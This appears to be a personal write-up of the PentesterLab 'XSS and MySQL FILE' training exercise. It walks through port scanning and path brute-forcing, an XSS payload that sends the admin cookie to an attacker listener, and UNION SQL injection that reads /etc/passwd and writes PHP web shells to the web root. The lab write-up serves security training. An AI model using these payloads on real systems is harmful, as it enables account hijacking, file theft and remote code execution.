Pentesterlab--Xss and MySQL FILE

It is time for you to act, LORD; your law is being broken. — Psalm 119:126

This course details the exploitation of a Cross-Site Scripting in a PHP based website and how an attacker can use it to gain access to the administration pages. Then, using this access, the attacker will be able to gain code execution on the server using SQL injections.

From Pentesterlab:

The attack is divided into 2 steps:

  1. Detection and exploitation of Cross-Site Scripting vulnerabilities: in this part, you will learn how to detect and exploit Cross-Site Scripting vulnerabilities.
  2. Access to the administration pages, then find and exploit a SQL injection to gain code execution. The last step in which you will access the operating system and run command.

Difficluty: 2/5


  • Nmap
  • wfuzz
  • Zap
  • Firebug
  • Cookie Manager+

Detail Assessment and Planning

  • Port scan to identify opened ports, running services and services version. —Nmap
  • Burte force hidden path of the server. —-wfuzz
  • Indetify XSS vuln and scan the website pages. —-Zap
  • Embeded script into page. —- Firebug
  • Deploy web shell.

Waging War

Weaknesses and Strengths

Used Nmap to idenfity opened ports. TCP port 80 is opened and Apache service is running on it.

nmap -sV -v -A

Use wfuzz to burte force hidden path of the server

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 2>/dev/null

Also I lauched zap to scan the website, try to find interesting things such as injection points and hidden pages. two things are very interesting. First of all, zap raises a flag for a xss vulnerability:

it looks like zap has already inject <script>alert(1);</script> into that page. If you visit the link “”, it will pop up an alert 1.

We can use this xss vulnerability to steal admin’s cookie.

keep going …

Before stealing admin’s cookie, we have to setup listener on attacking machine,

python -m SimpleHTTPServer 4444

use this payload instead of alert(1) in the xss (use firebug to edit the html)

<script>document.write('<img src="'+document.cookie+' "/>');</script> is attacker’s machine.

Now we got the cookie.

put the cookie in Cookie Manager+

now visit

Let’s explore the admin’s pages. First, click edit, it will go to

now looks like the url contains injection point, lets try to use single quote:'

we get error message:

Now we know that the web sites' absolute path is “/var/www/”

From pentesterlab

Exploiting SQL injection using UNION follows the steps below:

1 Find the number of columns to perform the UNION 2 Find what columns are echoed in the page 3 Retrieve information from the database meta-tables 4 Retrieve information from other tables/databases

In order to perform a request by SQL injection, you need to find the number of columns that are returned by the first part of the query. Unless you have the source code of the application, you will have to guess this number.

There are two methods to get this information:

1 using UNION SELECT and increase the number of columns; 2 using ORDER BY statement.

Here we use order by statement to get the number of columns order by 4 -- good order by 5 -- error

Now that we know the number of columns, we can retrieve information from the database. Based on the error message we received, we know that the backend database used is MySQL.

get DB version:,2,@@version,4

get /etc/passwd file:,2,load_file("/etc/passwd"),4

get user info:,2,user(),4

since the user is root, now we can deploy a webshell…

use UNION SELECT 1,2,"<?php @eval($_POST['pass'];)?>",4 into outfile "/var/www/css/evil.php" to create evil.php under css folder. Encode UNION SELECT 1,2,"<?php @eval($_POST['pass'];)?>",4 into outfile "/var/www/css/evil.php" part.

Now we can see that the evil.php is created successfully.

Cool… Lets write webshell now UNION select 1,2,"<?php system($_GET['c']); ?>",4 into outfile "/var/www/css/webshell.php"

of course. encode 0 UNION select 1,2,"<?php system($_GET['c']); ?>",4 into outfile "/var/www/css/webshell.php"

Now run command: /etc/passwd

encode /etc/passwd